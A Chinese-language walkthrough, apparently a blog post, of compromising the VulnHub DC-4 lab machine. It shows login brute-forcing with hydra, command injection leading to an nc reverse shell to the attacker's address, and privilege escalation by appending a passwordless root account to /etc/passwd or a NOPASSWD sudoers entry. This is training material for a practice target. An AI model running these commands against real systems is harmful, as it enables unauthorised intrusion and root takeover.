做教育app的网站,网站开发技术可行性,中国营销网站大全,wordpress 速度优化VulnHub系列 DC-4靶机详细渗透测试过程 目录 VulnHub系列 DC-4靶机详细渗透测试过程一、将靶机导入到虚拟机当中二、渗透流程主机发现端口扫描Web渗透暴力破解命令执行反弹shellSSH暴力破解提权 一、将靶机导入到虚拟机当中
靶机地址#xff1a;
https://download.vulnhub.c…VulnHub系列 DC-4靶机详细渗透测试过程 目录 VulnHub系列 DC-4靶机详细渗透测试过程一、将靶机导入到虚拟机当中二、渗透流程主机发现端口扫描Web渗透暴力破解命令执行反弹shellSSH暴力破解提权 一、将靶机导入到虚拟机当中
靶机地址
https://download.vulnhub.com/dc/DC-4.zip二、渗透流程
主机发现
使用arp-scan命令或者nmap命令进行主机发现 端口扫描
nmap -p- 192.168.43.27开放了22端口和80端口可以再扫一下服务
nmap -p80,22 -sV -A 192.168.43.27识别一下web服务看有什么信息
whatweb http://192.168.43.27并没有什么有价值的东西可利用接下来访问Web界面
Web渗透
暴力破解
来到web界面发现为登录界面根据页面提示为管理员登录但是通过简单信息收集并没有什么有效的信息那么直接进行弱口令暴力破解 输入用户名admin密码随意抓取登录数据包进行暴力破解 发送请求等待即可根据响应大小判断得到结果密码为happy 命令执行
回到后台等登录即可进入后台发现有命令工具进入查看点击run发现执行了ls -l命令得回显内容抓包看一下 尝试将命令换成其他命令如whoami观察是否回显直接可反弹shell
成功回显接下来进行反弹shell操作通过nc反弹
反弹shell radionc-e/bin/bash192.168.43.1058888submit%E8%B7%91kail端开启nc监听成功接收到shell 获取一个稳定shell
python -c import pty;pty.spawn(/bin/bash)观察当前目录下没有什么可用可看的文件回答家目录查看一下有无可用的信息
SSH暴力破解
到/home目录下发现有三个用户的家目录那么我们依次进入发现只有jim的家目录不为空其他两个家目录都为空 /home/jim目录下有三个文件分别查看一下 通过test.sh脚本的提示信息再加上查看发现的backups目录当中有密码信息通过我们得到的三个用户名信息再加上这个密码信息可以尝试ssh爆破登录观察是否可成功爆破出ssh用户的登录密码
先将获取的用户名和密码分别保存到文本文件当中接下来进行爆破
hydra -L user.txt -P passwd.txt ssh://192.168.43.27通过ssh爆破成功爆破出jim的ssh登录密码接下来我们以用户名jim远程登录到靶机当中进行下一步的操作 远程登录 查找一下目录看有无重要信息
通过仔细观察我们发现有一个邮件我们查看一下 去往此目录查看jim文件得内容信息发现charles发来的邮件并有连接密码 得到charles的ssh远程登录密码进行远程登录操作 然后我们再次通过charles用户进行远程登录成功登录发现也有邮件查看一下并无有用的信息 提权
接下来进行提权提权三步走
//查找suid权限的有无可利用
find / -perm -us -type f 2/dev/nullsu和sudo可利用一下但是均没成功 //列出目前用户可执行与无法执行的指令
sudo -l 查看发现在charles当中的sudo -l命令当中存在以root权限执行的命令 查看此命令帮助如何使用
teehee --help翻译我们使用-a参数 那么接下来我们可以直接向/etc/passwd 文件当中写入,查看一下/etc/passwd文件信息 //空密码直接追加到/etc/passwd
echo admin::0:0:admin:/root:/bin/bash | sudo teehee -a /etc/passwd或 修改charles权限给予为所欲为权限
echo charles ALL(ALL:ALL)NOPASSWD:ALL | sudo teehee -a /etc/sudoers直接切换admin用户发现charles无法切换换jim用户切换成功成功提权
su - adminjim用户切换成功
成功提权通关 文章不妥之处欢迎批评指正